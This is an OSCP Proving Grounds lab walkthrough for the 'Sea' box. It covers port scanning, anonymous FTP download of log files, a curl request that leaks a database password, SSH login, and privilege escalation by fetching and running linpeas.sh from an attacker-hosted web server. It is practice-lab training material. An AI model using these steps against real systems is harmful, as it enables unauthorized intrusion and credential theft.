Sea Walkthrough

OSCP Proving Grounds Box rated as an intermediate box by the community.

Initial Recon

I use rustscan to quickly identify open ports and then by adding the -sV -sC arguments it will automatically start nmap and use those scripts against the open ports it has found. This might be the quickest way to get a lay off the land and run specific scripts to get further information. 

rustscan -a 192.168.214.162 --ulimit 5000 -- -sC -sV

The last line in the image above we can see its starting nmap and running the scripts against any ports it’s found open.

NMAP results.

We are able to log into ftp via anonymous login, so I’ll go ahead and download all log files found on the ftp server.

ftp 192.168.214.162
# anonymous for user and passwd
prompt # turns off interactive prompt so I don't have to type yes for each file
mget *

Foothold

Checking the data within each log file we get some interesting output on the log2 file. It shows a POST request to a database path, and it mentions “exposed in request”. Immediately I want to check this path and see what exactly is “exposed”.

curl http://192.168.214.162:55743//th4o4p/database.php?cfg_dbpwd

We can also navigate to the webpage and get the visual.

SSH is open on the target so first I want to test if we can get a foothold with these creds on ssh. We find we are able to get in. If this didn’t work, I would have navigated to the open http ports we discovered and tested them against any login portals. 

ssh nicolas@192.168.214.162

Privilege Escalation

I always check if the current user has sudo permissions and our user nicolas has permissions to an aux binary. 

sudo -l

Quick check on GTFObins reveals there is no documented sudo priv esc for the ps binary that we can take advantage of. We have “write” permissions to /bin but replacing the ps file would not work because the sudo command would still need the “aux” argument. I’ll run linpeas.sh while do some more manual enumeration. 

# Kali
pyton3 -m http.server 80

# Target
wget http://192.168.45.244/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

We get another password in cleartext that is different than the one we used to log in as our current user. It’s worth trying to test this password to login as root.

Pwn3d!